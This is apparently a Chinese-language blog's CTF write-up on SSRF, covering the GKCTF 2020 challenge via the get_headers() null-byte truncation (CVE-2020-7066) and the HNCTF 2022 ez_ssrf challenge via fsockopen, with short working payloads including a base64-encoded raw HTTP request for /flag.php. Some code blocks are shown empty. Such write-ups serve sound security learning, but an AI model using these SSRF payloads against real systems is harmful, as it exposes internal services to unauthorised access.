Web入门-SSRF漏洞
Web入门-SSRF漏洞
[GKCTF 2020]cve版签到
SSRF漏洞,结合CVE-2020-7066:get_headers()
会被%00截断。
payload:
plaintext
1 | ?url=http://127.0.0.123%00www.ctfhub.com |
注,如下返回格式为get_headers()
的特征:
plaintext
1 | Array |
[HNCTF 2022 WEEK2]ez_ssrf
php
1 |
|
fsockopen
是一个用于在PHP中建立网络连接的函数。它可以通过TCP或UDP协议与远程服务器进行通信,并返回一个文件指针,可以在该连接上进行读写操作。
构造这个的Base64:
plaintext
1 | GET /flag.php HTTP/1.1 |
EXP:
plaintext
1 | /?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo= |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 The Blog of Monoceros406!